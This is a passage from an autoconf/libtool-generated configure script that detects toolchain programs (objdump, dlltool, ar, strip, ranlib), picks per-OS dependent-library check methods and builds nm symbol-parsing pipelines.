cegcc*) if test yes != "$GCC"; then reload_cmds=false fi ;; darwin*) if test yes = "$GCC"; then reload_cmds='$LTCC $LTCFLAGS -nostdlib $wl-r -o $output$reload_objs' else reload_cmds='$LD$reload_flag -o $output$reload_objs' fi ;; esac if test -n "$ac_tool_prefix"; then # Extract the first word of "${ac_tool_prefix}objdump", so it can be a program name with args. set dummy ${ac_tool_prefix}objdump; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_prog_OBJDUMP+:} false; then : $as_echo_n "(cached) " >&6 else if test -n "$OBJDUMP"; then ac_cv_prog_OBJDUMP="$OBJDUMP" # Let the user override the test. else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_prog_OBJDUMP="${ac_tool_prefix}objdump" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS fi fi OBJDUMP=$ac_cv_prog_OBJDUMP if test -n "$OBJDUMP"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $OBJDUMP" >&5 $as_echo "$OBJDUMP" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi fi if test -z "$ac_cv_prog_OBJDUMP"; then ac_ct_OBJDUMP=$OBJDUMP # Extract the first word of "objdump", so it can be a program name with args. set dummy objdump; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_prog_ac_ct_OBJDUMP+:} false; then : $as_echo_n "(cached) " >&6 else if test -n "$ac_ct_OBJDUMP"; then ac_cv_prog_ac_ct_OBJDUMP="$ac_ct_OBJDUMP" # Let the user override the test. else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_prog_ac_ct_OBJDUMP="objdump" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS fi fi ac_ct_OBJDUMP=$ac_cv_prog_ac_ct_OBJDUMP if test -n "$ac_ct_OBJDUMP"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_ct_OBJDUMP" >&5 $as_echo "$ac_ct_OBJDUMP" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi if test "x$ac_ct_OBJDUMP" = x; then OBJDUMP="false" else case $cross_compiling:$ac_tool_warned in yes:) { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: using cross tools not prefixed with host triplet" >&5 $as_echo "$as_me: WARNING: using cross tools not prefixed with host triplet" >&2;} ac_tool_warned=yes ;; esac OBJDUMP=$ac_ct_OBJDUMP fi else OBJDUMP="$ac_cv_prog_OBJDUMP" fi test -z "$OBJDUMP" && OBJDUMP=objdump { $as_echo "$as_me:${as_lineno-$LINENO}: checking how to recognize dependent libraries" >&5 $as_echo_n "checking how to recognize dependent libraries... " >&6; } if ${lt_cv_deplibs_check_method+:} false; then : $as_echo_n "(cached) " >&6 else lt_cv_file_magic_cmd='$MAGIC_CMD' lt_cv_file_magic_test_file= lt_cv_deplibs_check_method='unknown' # Need to set the preceding variable on all platforms that support # interlibrary dependencies. # 'none' -- dependencies not supported. # 'unknown' -- same as none, but documents that we really don't know. # 'pass_all' -- all dependencies passed with no checks. # 'test_compile' -- check by making test program. # 'file_magic [[regex]]' -- check by looking for files in library path # that responds to the $file_magic_cmd with a given extended regex. # If you have 'file' or equivalent on your system and you're not sure # whether 'pass_all' will *always* work, you probably want this one. case $host_os in aix[4-9]*) lt_cv_deplibs_check_method=pass_all ;; beos*) lt_cv_deplibs_check_method=pass_all ;; bsdi[45]*) lt_cv_deplibs_check_method='file_magic ELF [0-9][0-9]*-bit [ML]SB (shared object|dynamic lib)' lt_cv_file_magic_cmd='/usr/bin/file -L' lt_cv_file_magic_test_file=/shlib/libc.so ;; cygwin*) # func_win32_libid is a shell function defined in ltmain.sh lt_cv_deplibs_check_method='file_magic ^x86 archive import|^x86 DLL' lt_cv_file_magic_cmd='func_win32_libid' ;; mingw* | pw32*) # Base MSYS/MinGW do not provide the 'file' command needed by # func_win32_libid shell function, so use a weaker test based on 'objdump', # unless we find 'file', for example because we are cross-compiling. if ( file / ) >/dev/null 2>&1; then lt_cv_deplibs_check_method='file_magic ^x86 archive import|^x86 DLL' lt_cv_file_magic_cmd='func_win32_libid' else # Keep this pattern in sync with the one in func_win32_libid. lt_cv_deplibs_check_method='file_magic file format (pei*-i386(.*architecture: i386)?|pe-arm-wince|pe-x86-64)' lt_cv_file_magic_cmd='$OBJDUMP -f' fi ;; cegcc*) # use the weaker test based on 'objdump'. See mingw*. lt_cv_deplibs_check_method='file_magic file format pe-arm-.*little(.*architecture: arm)?' lt_cv_file_magic_cmd='$OBJDUMP -f' ;; darwin* | rhapsody*) lt_cv_deplibs_check_method=pass_all ;; freebsd* | dragonfly*) if echo __ELF__ | $CC -E - | $GREP __ELF__ > /dev/null; then case $host_cpu in i*86 ) # Not sure whether the presence of OpenBSD here was a mistake. # Let's accept both of them until this is cleared up. lt_cv_deplibs_check_method='file_magic (FreeBSD|OpenBSD|DragonFly)/i[3-9]86 (compact )?demand paged shared library' lt_cv_file_magic_cmd=/usr/bin/file lt_cv_file_magic_test_file=`echo /usr/lib/libc.so.*` ;; esac else lt_cv_deplibs_check_method=pass_all fi ;; haiku*) lt_cv_deplibs_check_method=pass_all ;; hpux10.20* | hpux11*) lt_cv_file_magic_cmd=/usr/bin/file case $host_cpu in ia64*) lt_cv_deplibs_check_method='file_magic (s[0-9][0-9][0-9]|ELF-[0-9][0-9]) shared object file - IA64' lt_cv_file_magic_test_file=/usr/lib/hpux32/libc.so ;; hppa*64*) lt_cv_deplibs_check_method='file_magic (s[0-9][0-9][0-9]|ELF[ -][0-9][0-9])(-bit)?( [LM]SB)? shared object( file)?[, -]* PA-RISC [0-9]\.[0-9]' lt_cv_file_magic_test_file=/usr/lib/pa20_64/libc.sl ;; *) lt_cv_deplibs_check_method='file_magic (s[0-9][0-9][0-9]|PA-RISC[0-9]\.[0-9]) shared library' lt_cv_file_magic_test_file=/usr/lib/libc.sl ;; esac ;; interix[3-9]*) # PIC code is broken on Interix 3.x, that's why |\.a not |_pic\.a here lt_cv_deplibs_check_method='match_pattern /lib[^/]+(\.so|\.a)$' ;; irix5* | irix6* | nonstopux*) case $LD in *-32|*"-32 ") libmagic=32-bit;; *-n32|*"-n32 ") libmagic=N32;; *-64|*"-64 ") libmagic=64-bit;; *) libmagic=never-match;; esac lt_cv_deplibs_check_method=pass_all ;; # This must be glibc/ELF. linux* | k*bsd*-gnu | kopensolaris*-gnu | gnu*) lt_cv_deplibs_check_method=pass_all ;; netbsd*) if echo __ELF__ | $CC -E - | $GREP __ELF__ > /dev/null; then lt_cv_deplibs_check_method='match_pattern /lib[^/]+(\.so\.[0-9]+\.[0-9]+|_pic\.a)$' else lt_cv_deplibs_check_method='match_pattern /lib[^/]+(\.so|_pic\.a)$' fi ;; newos6*) lt_cv_deplibs_check_method='file_magic ELF [0-9][0-9]*-bit [ML]SB (executable|dynamic lib)' lt_cv_file_magic_cmd=/usr/bin/file lt_cv_file_magic_test_file=/usr/lib/libnls.so ;; *nto* | *qnx*) lt_cv_deplibs_check_method=pass_all ;; openbsd* | bitrig*) if test -z "`echo __ELF__ | $CC -E - | $GREP __ELF__`"; then lt_cv_deplibs_check_method='match_pattern /lib[^/]+(\.so\.[0-9]+\.[0-9]+|\.so|_pic\.a)$' else lt_cv_deplibs_check_method='match_pattern /lib[^/]+(\.so\.[0-9]+\.[0-9]+|_pic\.a)$' fi ;; osf3* | osf4* | osf5*) lt_cv_deplibs_check_method=pass_all ;; rdos*) lt_cv_deplibs_check_method=pass_all ;; solaris*) lt_cv_deplibs_check_method=pass_all ;; sysv5* | sco3.2v5* | sco5v6* | unixware* | OpenUNIX* | sysv4*uw2*) lt_cv_deplibs_check_method=pass_all ;; sysv4 | sysv4.3*) case $host_vendor in motorola) lt_cv_deplibs_check_method='file_magic ELF [0-9][0-9]*-bit [ML]SB (shared object|dynamic lib) M[0-9][0-9]* Version [0-9]' lt_cv_file_magic_test_file=`echo /usr/lib/libc.so*` ;; ncr) lt_cv_deplibs_check_method=pass_all ;; sequent) lt_cv_file_magic_cmd='/bin/file' lt_cv_deplibs_check_method='file_magic ELF [0-9][0-9]*-bit [LM]SB (shared object|dynamic lib )' ;; sni) lt_cv_file_magic_cmd='/bin/file' lt_cv_deplibs_check_method="file_magic ELF [0-9][0-9]*-bit [LM]SB dynamic lib" lt_cv_file_magic_test_file=/lib/libc.so ;; siemens) lt_cv_deplibs_check_method=pass_all ;; pc) lt_cv_deplibs_check_method=pass_all ;; esac ;; tpf*) lt_cv_deplibs_check_method=pass_all ;; os2*) lt_cv_deplibs_check_method=pass_all ;; esac fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $lt_cv_deplibs_check_method" >&5 $as_echo "$lt_cv_deplibs_check_method" >&6; } file_magic_glob= want_nocaseglob=no if test "$build" = "$host"; then case $host_os in mingw* | pw32*) if ( shopt | grep nocaseglob ) >/dev/null 2>&1; then want_nocaseglob=yes else file_magic_glob=`echo aAbBcCdDeEfFgGhHiIjJkKlLmMnNoOpPqQrRsStTuUvVwWxXyYzZ | $SED -e "s/\(..\)/s\/[\1]\/[\1]\/g;/g"` fi ;; esac fi file_magic_cmd=$lt_cv_file_magic_cmd deplibs_check_method=$lt_cv_deplibs_check_method test -z "$deplibs_check_method" && deplibs_check_method=unknown if test -n "$ac_tool_prefix"; then # Extract the first word of "${ac_tool_prefix}dlltool", so it can be a program name with args. set dummy ${ac_tool_prefix}dlltool; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_prog_DLLTOOL+:} false; then : $as_echo_n "(cached) " >&6 else if test -n "$DLLTOOL"; then ac_cv_prog_DLLTOOL="$DLLTOOL" # Let the user override the test. else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_prog_DLLTOOL="${ac_tool_prefix}dlltool" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS fi fi DLLTOOL=$ac_cv_prog_DLLTOOL if test -n "$DLLTOOL"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $DLLTOOL" >&5 $as_echo "$DLLTOOL" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi fi if test -z "$ac_cv_prog_DLLTOOL"; then ac_ct_DLLTOOL=$DLLTOOL # Extract the first word of "dlltool", so it can be a program name with args. set dummy dlltool; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_prog_ac_ct_DLLTOOL+:} false; then : $as_echo_n "(cached) " >&6 else if test -n "$ac_ct_DLLTOOL"; then ac_cv_prog_ac_ct_DLLTOOL="$ac_ct_DLLTOOL" # Let the user override the test. else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_prog_ac_ct_DLLTOOL="dlltool" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS fi fi ac_ct_DLLTOOL=$ac_cv_prog_ac_ct_DLLTOOL if test -n "$ac_ct_DLLTOOL"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_ct_DLLTOOL" >&5 $as_echo "$ac_ct_DLLTOOL" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi if test "x$ac_ct_DLLTOOL" = x; then DLLTOOL="false" else case $cross_compiling:$ac_tool_warned in yes:) { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: using cross tools not prefixed with host triplet" >&5 $as_echo "$as_me: WARNING: using cross tools not prefixed with host triplet" >&2;} ac_tool_warned=yes ;; esac DLLTOOL=$ac_ct_DLLTOOL fi else DLLTOOL="$ac_cv_prog_DLLTOOL" fi test -z "$DLLTOOL" && DLLTOOL=dlltool { $as_echo "$as_me:${as_lineno-$LINENO}: checking how to associate runtime and link libraries" >&5 $as_echo_n "checking how to associate runtime and link libraries... " >&6; } if ${lt_cv_sharedlib_from_linklib_cmd+:} false; then : $as_echo_n "(cached) " >&6 else lt_cv_sharedlib_from_linklib_cmd='unknown' case $host_os in cygwin* | mingw* | pw32* | cegcc*) # two different shell functions defined in ltmain.sh; # decide which one to use based on capabilities of $DLLTOOL case `$DLLTOOL --help 2>&1` in *--identify-strict*) lt_cv_sharedlib_from_linklib_cmd=func_cygming_dll_for_implib ;; *) lt_cv_sharedlib_from_linklib_cmd=func_cygming_dll_for_implib_fallback ;; esac ;; *) # fallback: assume linklib IS sharedlib lt_cv_sharedlib_from_linklib_cmd=$ECHO ;; esac fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $lt_cv_sharedlib_from_linklib_cmd" >&5 $as_echo "$lt_cv_sharedlib_from_linklib_cmd" >&6; } sharedlib_from_linklib_cmd=$lt_cv_sharedlib_from_linklib_cmd test -z "$sharedlib_from_linklib_cmd" && sharedlib_from_linklib_cmd=$ECHO if test -n "$ac_tool_prefix"; then for ac_prog in ar do # Extract the first word of "$ac_tool_prefix$ac_prog", so it can be a program name with args. set dummy $ac_tool_prefix$ac_prog; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_prog_AR+:} false; then : $as_echo_n "(cached) " >&6 else if test -n "$AR"; then ac_cv_prog_AR="$AR" # Let the user override the test. else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_prog_AR="$ac_tool_prefix$ac_prog" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS fi fi AR=$ac_cv_prog_AR if test -n "$AR"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $AR" >&5 $as_echo "$AR" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi test -n "$AR" && break done fi if test -z "$AR"; then ac_ct_AR=$AR for ac_prog in ar do # Extract the first word of "$ac_prog", so it can be a program name with args. set dummy $ac_prog; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_prog_ac_ct_AR+:} false; then : $as_echo_n "(cached) " >&6 else if test -n "$ac_ct_AR"; then ac_cv_prog_ac_ct_AR="$ac_ct_AR" # Let the user override the test. else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_prog_ac_ct_AR="$ac_prog" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS fi fi ac_ct_AR=$ac_cv_prog_ac_ct_AR if test -n "$ac_ct_AR"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_ct_AR" >&5 $as_echo "$ac_ct_AR" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi test -n "$ac_ct_AR" && break done if test "x$ac_ct_AR" = x; then AR="false" else case $cross_compiling:$ac_tool_warned in yes:) { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: using cross tools not prefixed with host triplet" >&5 $as_echo "$as_me: WARNING: using cross tools not prefixed with host triplet" >&2;} ac_tool_warned=yes ;; esac AR=$ac_ct_AR fi fi : ${AR=ar} # Use ARFLAGS variable as AR's operation code to sync the variable naming with # Automake. If both AR_FLAGS and ARFLAGS are specified, AR_FLAGS should have # higher priority because thats what people were doing historically (setting # ARFLAGS for automake and AR_FLAGS for libtool). FIXME: Make the AR_FLAGS # variable obsoleted/removed. test ${AR_FLAGS+y} || AR_FLAGS=${ARFLAGS-cr} lt_ar_flags=$AR_FLAGS # Make AR_FLAGS overridable by 'make ARFLAGS='. Don't try to run-time override # by AR_FLAGS because that was never working and AR_FLAGS is about to die. { $as_echo "$as_me:${as_lineno-$LINENO}: checking for archiver @FILE support" >&5 $as_echo_n "checking for archiver @FILE support... " >&6; } if ${lt_cv_ar_at_file+:} false; then : $as_echo_n "(cached) " >&6 else lt_cv_ar_at_file=no cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ int main () { ; return 0; } _ACEOF if ac_fn_c_try_compile "$LINENO"; then : echo conftest.$ac_objext > conftest.lst lt_ar_try='$AR $AR_FLAGS libconftest.a @conftest.lst >&5' { { eval echo "\"\$as_me\":${as_lineno-$LINENO}: \"$lt_ar_try\""; } >&5 (eval $lt_ar_try) 2>&5 ac_status=$? $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 test $ac_status = 0; } if test 0 -eq "$ac_status"; then # Ensure the archiver fails upon bogus file names. rm -f conftest.$ac_objext libconftest.a { { eval echo "\"\$as_me\":${as_lineno-$LINENO}: \"$lt_ar_try\""; } >&5 (eval $lt_ar_try) 2>&5 ac_status=$? $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 test $ac_status = 0; } if test 0 -ne "$ac_status"; then lt_cv_ar_at_file=@ fi fi rm -f conftest.* libconftest.a fi rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $lt_cv_ar_at_file" >&5 $as_echo "$lt_cv_ar_at_file" >&6; } if test no = "$lt_cv_ar_at_file"; then archiver_list_spec= else archiver_list_spec=$lt_cv_ar_at_file fi if test -n "$ac_tool_prefix"; then # Extract the first word of "${ac_tool_prefix}strip", so it can be a program name with args. set dummy ${ac_tool_prefix}strip; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_prog_STRIP+:} false; then : $as_echo_n "(cached) " >&6 else if test -n "$STRIP"; then ac_cv_prog_STRIP="$STRIP" # Let the user override the test. else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_prog_STRIP="${ac_tool_prefix}strip" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS fi fi STRIP=$ac_cv_prog_STRIP if test -n "$STRIP"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $STRIP" >&5 $as_echo "$STRIP" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi fi if test -z "$ac_cv_prog_STRIP"; then ac_ct_STRIP=$STRIP # Extract the first word of "strip", so it can be a program name with args. set dummy strip; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_prog_ac_ct_STRIP+:} false; then : $as_echo_n "(cached) " >&6 else if test -n "$ac_ct_STRIP"; then ac_cv_prog_ac_ct_STRIP="$ac_ct_STRIP" # Let the user override the test. else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_prog_ac_ct_STRIP="strip" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS fi fi ac_ct_STRIP=$ac_cv_prog_ac_ct_STRIP if test -n "$ac_ct_STRIP"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_ct_STRIP" >&5 $as_echo "$ac_ct_STRIP" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi if test "x$ac_ct_STRIP" = x; then STRIP=":" else case $cross_compiling:$ac_tool_warned in yes:) { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: using cross tools not prefixed with host triplet" >&5 $as_echo "$as_me: WARNING: using cross tools not prefixed with host triplet" >&2;} ac_tool_warned=yes ;; esac STRIP=$ac_ct_STRIP fi else STRIP="$ac_cv_prog_STRIP" fi test -z "$STRIP" && STRIP=: if test -n "$ac_tool_prefix"; then # Extract the first word of "${ac_tool_prefix}ranlib", so it can be a program name with args. set dummy ${ac_tool_prefix}ranlib; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_prog_RANLIB+:} false; then : $as_echo_n "(cached) " >&6 else if test -n "$RANLIB"; then ac_cv_prog_RANLIB="$RANLIB" # Let the user override the test. else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_prog_RANLIB="${ac_tool_prefix}ranlib" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS fi fi RANLIB=$ac_cv_prog_RANLIB if test -n "$RANLIB"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $RANLIB" >&5 $as_echo "$RANLIB" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi fi if test -z "$ac_cv_prog_RANLIB"; then ac_ct_RANLIB=$RANLIB # Extract the first word of "ranlib", so it can be a program name with args. set dummy ranlib; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_prog_ac_ct_RANLIB+:} false; then : $as_echo_n "(cached) " >&6 else if test -n "$ac_ct_RANLIB"; then ac_cv_prog_ac_ct_RANLIB="$ac_ct_RANLIB" # Let the user override the test. else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_prog_ac_ct_RANLIB="ranlib" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS fi fi ac_ct_RANLIB=$ac_cv_prog_ac_ct_RANLIB if test -n "$ac_ct_RANLIB"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_ct_RANLIB" >&5 $as_echo "$ac_ct_RANLIB" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi if test "x$ac_ct_RANLIB" = x; then RANLIB=":" else case $cross_compiling:$ac_tool_warned in yes:) { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: using cross tools not prefixed with host triplet" >&5 $as_echo "$as_me: WARNING: using cross tools not prefixed with host triplet" >&2;} ac_tool_warned=yes ;; esac RANLIB=$ac_ct_RANLIB fi else RANLIB="$ac_cv_prog_RANLIB" fi test -z "$RANLIB" && RANLIB=: # Determine commands to create old-style static archives. old_archive_cmds='$AR $AR_FLAGS $oldlib$oldobjs' old_postinstall_cmds='chmod 644 $oldlib' old_postuninstall_cmds= if test -n "$RANLIB"; then case $host_os in bitrig* | openbsd*) old_postinstall_cmds="$old_postinstall_cmds~\$RANLIB -t \$tool_oldlib" ;; *) old_postinstall_cmds="$old_postinstall_cmds~\$RANLIB \$tool_oldlib" ;; esac old_archive_cmds="$old_archive_cmds~\$RANLIB \$tool_oldlib" fi case $host_os in darwin*) lock_old_archive_extraction=yes ;; *) lock_old_archive_extraction=no ;; esac # If no C compiler was specified, use CC. LTCC=${LTCC-"$CC"} # If no C compiler flags were specified, use CFLAGS. LTCFLAGS=${LTCFLAGS-"$CFLAGS"} # Allow CC to be a program name with arguments. compiler=$CC # Check for command to grab the raw symbol name followed by C symbol from nm. { $as_echo "$as_me:${as_lineno-$LINENO}: checking command to parse $NM output from $compiler object" >&5 $as_echo_n "checking command to parse $NM output from $compiler object... " >&6; } if ${lt_cv_sys_global_symbol_pipe+:} false; then : $as_echo_n "(cached) " >&6 else # These are sane defaults that work on at least a few old systems. # [They come from Ultrix. What could be older than Ultrix?!! ;)] # Character class describing NM global symbol codes. symcode='[BCDEGRST]' # Regexp to match symbols that can be accessed directly from C. sympat='\([_A-Za-z][_A-Za-z0-9]*\)' # Define system-specific variables. case $host_os in aix*) symcode='[BCDT]' ;; cygwin* | mingw* | pw32* | cegcc*) symcode='[ABCDGISTW]' ;; hpux*) if test ia64 = "$host_cpu"; then symcode='[ABCDEGRST]' fi ;; irix* | nonstopux*) symcode='[BCDEGRST]' ;; osf*) symcode='[BCDEGQRST]' ;; solaris*) symcode='[BDRT]' ;; sco3.2v5*) symcode='[DT]' ;; sysv4.2uw2*) symcode='[DT]' ;; sysv5* | sco5v6* | unixware* | OpenUNIX*) symcode='[ABDT]' ;; sysv4) symcode='[DFNSTU]' ;; esac # If we're using GNU nm, then use its standard symbol codes. case `$NM -V 2>&1` in *GNU* | *'with BFD'*) symcode='[ABCDGIRSTW]' ;; esac if test "$lt_cv_nm_interface" = "MS dumpbin"; then # Gets list of data symbols to import. lt_cv_sys_global_symbol_to_import="sed -n -e 's/^I .* \(.*\)$/\1/p'" # Adjust the below global symbol transforms to fixup imported variables. lt_cdecl_hook=" -e 's/^I .* \(.*\)$/extern __declspec(dllimport) char \1;/p'" lt_c_name_hook=" -e 's/^I .* \(.*\)$/ {\"\1\", (void *) 0},/p'" lt_c_name_lib_hook="\ -e 's/^I .* \(lib.*\)$/ {\"\1\", (void *) 0},/p'\ -e 's/^I .* \(.*\)$/ {\"lib\1\", (void *) 0},/p'" else # Disable hooks by default. lt_cv_sys_global_symbol_to_import= lt_cdecl_hook= lt_c_name_hook= lt_c_name_lib_hook= fi # Transform an extracted symbol line into a proper C declaration. # Some systems (esp. on ia64) link data and code symbols differently, # so use this general approach. lt_cv_sys_global_symbol_to_cdecl="sed -n"\ $lt_cdecl_hook\ " -e 's/^T .* \(.*\)$/extern int \1();/p'"\ " -e 's/^$symcode$symcode* .* \(.*\)$/extern char \1;/p'" # Transform an extracted symbol line into symbol name and symbol address lt_cv_sys_global_symbol_to_c_name_address="sed -n"\ $lt_c_name_hook\ " -e 's/^: \(.*\) .*$/ {\"\1\", (void *) 0},/p'"\ " -e 's/^$symcode$symcode* .* \(.*\)$/ {\"\1\", (void *) \&\1},/p'" # Transform an extracted symbol line into symbol name with lib prefix and # symbol address. lt_cv_sys_global_symbol_to_c_name_address_lib_prefix="sed -n"\ $lt_c_name_lib_hook\ " -e 's/^: \(.*\) .*$/ {\"\1\", (void *) 0},/p'"\ " -e 's/^$symcode$symcode* .* \(lib.*\)$/ {\"\1\", (void *) \&\1},/p'"\ " -e 's/^$symcode$symcode* .* \(.*\)$/ {\"lib\1\", (void *) \&\1},/p'" # Handle CRLF in mingw tool chain opt_cr= case $build_os in mingw*) opt_cr=`$ECHO 'x\{0,1\}' | tr x '\015'` # option cr in regexp ;; esac # Try without a prefix underscore, then with it. for ac_symprfx in "" "_"; do # Transform symcode, sympat, and symprfx into a raw symbol and a C symbol. symxfrm="\\1 $ac_symprfx\\2 \\2" # Write the raw and C identifiers. if test "$lt_cv_nm_interface" = "MS dumpbin"; then # Fake it for dumpbin and say T for any non-static function, # D for any global variable and I for any imported variable. # Also find C++ and __fastcall symbols from MSVC++ or ICC, # which start with @ or ?. lt_cv_sys_global_symbol_pipe="$AWK '"\ " {last_section=section; section=\$ 3};"\ " /^COFF SYMBOL TABLE/{for(i in hide) delete hide[i]};"\ " /Section length .*#relocs.*(pick any)/{hide[last_section]=1};"\ " /^ *Symbol name *: /{split(\$ 0,sn,\":\"); si=substr(sn[2],2)};"\ " /^ *Type *: code/{print \"T\",si,substr(si,length(prfx))};"\ " /^ *Type *: data/{print 